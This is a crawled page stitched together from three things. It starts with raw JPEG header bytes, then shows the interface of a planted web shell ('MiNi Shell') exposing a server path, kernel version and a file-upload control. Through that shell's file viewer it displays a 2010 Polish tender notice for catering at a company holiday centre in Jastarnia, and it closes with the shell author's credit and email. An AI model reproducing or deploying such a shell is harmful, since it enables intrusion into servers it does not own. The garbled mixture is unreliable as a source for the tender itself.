JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100204/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100204/31426-N-2010.html

<p class="kh_header"><b>Częstochowa: Świadczenie usług gastronomicznych w zakresie przygotowywania i podawania obiadów. TZ/3/10/P-P</b><br>
<b>Numer ogłoszenia: 31426 - 2010; data zamieszczenia: 04.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Przedsiębiorstwo Wodociągów i Kanalizacji Okręgu Częstochowskiego Spółka Akcyjna , ul. Jaskrowska 14/44, 42-200 Częstochowa, woj. śląskie, tel. 034 37 73 199, faks 034 365-15-82.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pwik.czest.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: spółka prawa handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług gastronomicznych w zakresie przygotowywania i podawania obiadów. TZ/3/10/P-P.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Świadczenie usług gastronomicznych w zakresie przygotowywania i podawania obiadów, w ilości szacunkowej 6 500 obiadów, dla wczasowiczów  Zakładowego Ośrodka Wczasowego  w Jastarni ul. Mickiewicza 166, w okresie  19.05. - 21.09.2010 r. - w 9 turnusach, każdy po 14 dni (Zamawiający zastrzega sobie prawo rezygnacji z ostatnich 14-tu dni).
Obiad winien składać się z dwóch dań: I danie + II danie + kompot + w niedzielę deser zgodnie  z menu, określonym w jadłospisie stanowiącym załącznik A SIWZ.
Miejsce realizacji: Jastarnia ul. Mickiewicza ul. 166.
Zamawiający zastrzega sobie prawo zmiany podanych ilości w granicach do 30 %.
Opis sposobu wykonania przedmiotu zamówienia:
1.usługi objęte zamówieniem winny być wykonywane w obiekcie, stanowiącym własność Zamawiającego, zlokalizowanym na terenie Zakładowego Ośrodka Wczasowego w Jastarni,  ul. Mickiewicza 166,
2.Wykonawca zamówienia zobowiązany jest do zawarcia z Zamawiającym umowy najmu lokalu, o którym mowa w pkt 1 na warunkach określonych umową stanowiącą załącznik nr 6 do SIWZ,  
3. Zamawiający oddaje budynek stołówki i kuchni (całkowita powierzchnia 118,08 m2) wraz  z wyposażeniem do dyspozycji Wykonawcy za kwotę 400 zł netto plus VAT/miesiąc; płatne z góry do 10 każdego miesiąca na podstawie faktury za dany miesiąc,
4.dodatkowo wynajmujący ponosić będzie koszty energii elektrycznej - 350,00 zł netto plus VAT /m-c, udostępnienia wody 250,00 zł netto plus VAT /m-c, odprowadzania ścieków 250,00 zł netto plus VAT /m-c, opłaty zryczałtowane, płatne z góry do 10 każdego miesiąca na podstawie faktury za dany miesiąc,
5.Zamawiający, za dodatkową opłatą, dopuszcza możliwość wynajęcia domku campingowego dla potrzeb obsługi Wykonawcy,
6.budynek kuchni i stołówki wraz z wyposażeniem będzie przekazany Wykonawcy na podstawie spisu zdawczo-odbiorczego sporządzonego przez pracowników Zamawiającego i Wykonawcy, w terminie do dnia 15.05.2010 r., Wykonawca zobowiązany jest zapewnić ewentualne brakujące wyposażenie (spis aktualnego wyposażenia do wglądu u Zamawiającego)
7.opłaty za wynajem kuchni i stołówki oraz koszty energii elektrycznej, wody i ścieków liczone będą od dnia przekazania Wykonawcy budynku kuchni i stołówki,
8.Wykonawca po zakończeniu sezonu wczasowego na podstawie spisu zdawczo-odbiorczego winien przekazać   w stanie nie pogorszonym Zamawiającemu budynek kuchni i stołówki wraz z wyposażeniem; w przypadku stwierdzenia jakichkolwiek braków lub uszkodzeń, Wykonawca będzie obciążony kosztami zakupu/ naprawy sprzętu (decyzję podejmuje Zamawiający) wyliczonymi wg obowiązujących cen,
9.w okresie objętym umową Wykonawca odpowiada i ponosi koszty utrzymania czystości oddanego do używania sprzętu i budynków,
10.w czasie trwania umowy Wykonawca ponosi odpowiedzialność przed właściwymi organami Inspekcji Sanitarnej,
11.usługi objęte zamówieniem winny być wykonywane w okresie od dnia 19.05.2010 r. do dnia 21.09.2010r. - w 9 turnusach, każdy po 14 dni, Zamawiający ma prawo skrócić okres świadczenia usług do dnia 07.09.2010 r. przy zachowaniu podanej przez Wykonawcę ceny jednego obiadu,
12.usługi określone w niniejszej SIWZ winny być świadczone wyłącznie dla wczasowiczów przebywających  w Zakładowym Ośrodku Wczasowym w Jastarni ul. Mickiewicza 166 dla  ilości osób zgłoszonych przez uprawnionych pracowników Zamawiającego,
13.dodatkowo usługi winny być świadczone dla osób dojeżdżających do wczasowiczów przebywających w Zakładowym Ośrodku Wczasowym w Jastarni  w trakcie trwania turnusu, które winny wykupić obiady wyłącznie u Gospodarza Ośrodka, który zgłasza, Wykonawcy konieczność przygotowania  i podania  w danym dniu dodatkowej liczby obiadów,
14.Zamawiający nie dopuszcza świadczenia usług dla osób nie zgłoszonych przez uprawnionych pracowników Zamawiającego,
15.Zamawiający wymaga aby przedmiotowy zakres świadczonych usług obejmował co najmniej:
a.codzienne przygotowywanie obiadów ze świeżych produktów w pomieszczeniach do tego przeznaczonych na terenie Zakładowego Ośrodka Wczasowego w Jastarni,
b.podawanie obiadów w dwóch turach: pierwsza o godz. 13:30 i druga o godz. 14:15, w następujący sposób: I danie - zupa w wazie na każdy stół, II danie, kompot i deser na   indywidualnych nakryciach na stół przez obsługę (brak samoobsługi),wymagane jest, aby surówka podawana była na indywidualnych okryciach; w przypadku małej ilości wczasowiczów w pierwszym i ostatnim turnusie, dopuszcza się możliwość podania obiadów w jednej turze o godz. 13:45,
c.przygotowywanie stołów, na których będą podawane obiady tzn. nakrywać wszystkie stoły czystymi jednokolorowymi obrusami, na wszystkich stołach obrusy muszą być tego samego rodzaju i koloru,  nie dopuszcza się nakrywania stołów obrusami ceratowymi,
d.stawianie na stołach serwetek dostępnych dla wczasowiczów,  
e.oznaczenie stołów numerami od 1 - 10 dla wczasowiczów korzystających z obiadów w pierwszej turze oraz od 11 - 20 dla wczasowiczów korzystających z obiadów w drugiej turze,
16.Zamawiający ma prawo zamówić pełną porcję obiadu za 100 % ceny netto + VAT określonej   w umowie  lub 1/2 porcji   w przypadku dzieci w wieku od lat 5 - 15 za  50 % w/w ceny,
17.Zamawiający dopuszcza możliwość przygotowywania przez Wykonawcę innych posiłków niż obiad oraz prowadzenia bufetu (drobna sprzedaż art. spożywczych, napojów bezalkoholowych) dla osób objętych przedmiotem zamówienia, 
18.rozliczenie za zakupione obiady, następować będzie po zakończeniu każdego turnusu , na podstawie faktury VAT wraz z zestawieniem ilości zamówionych i wydanych posiłków,
19.forma płatności - przelewem w ciągu 14 dni, od otrzymania faktury VAT wraz z  zestawieniem ilości zamówionych i wydanych posiłków, na konto Wykonawcy,
20.Wykonawca zobowiązany jest do przestrzegania wymagań określonych w ustawie  o bezpieczeństwie żywności i żywienia z dnia 25 sierpnia 2006 r. (Dz. U. z 2006 r. Nr 171 poz. 1225 z późniejszymi  zmianami),
21.Wykonawca zobowiązany jest do przedstawienia oświadczenia o wdrożeniu i stosowaniu zasad systemu HACCP,
22.Wykonawca winien wykonywać zamówienie zgodnie z przepisami z zakresu ochrony środowiska,.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.00.00-9, 55.32.10.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć oświadczenie o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca składając ofertę  powinien wykazać, że wykonał w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres działalności jest krótszy - w tym okresie, przynajmniej dwa zamówienia  zbiorowego żywienia jednorazowo co najmniej dla 50 osób,  polegające na przygotowywaniu i podawaniu dla grup zorganizowanych obiadów w barach, restauracjach, hotelach, pensjonatach, stołówkach pracowniczych, w czasie pobytu osób na koloniach letnich, obozach młodzieżowych, zimowiskach, zielonych szkołach</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć oświadczenie o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć oświadczenie o spełnianiu tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien złożyć oświadczenie o spełnianiu tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.oświadczenie o wdrożeniu i stosowaniu zasad systemu HACCP, 
2. formularz ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pwik.czest.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> PRZEDSIĘBIORSTWO WODOCIĄGÓW I KANALIZACJI OKRĘGU CZĘSTOCHOWSKIEGO SPÓŁKA AKCYJNA W CZĘSTOCHOWIE
42-202 CZĘSTOCHOWA  UL. JASKROWSKA 14/20
pokój 316.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.02.2010 godzina 09:00, miejsce: PRZEDSIĘBIORSTWO WODOCIĄGÓW I KANALIZACJI OKRĘGU CZĘSTOCHOWSKIEGO SPÓŁKA AKCYJNA W CZĘSTOCHOWIE
42-202 CZĘSTOCHOWA  UL. JASKROWSKA 14/20
Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com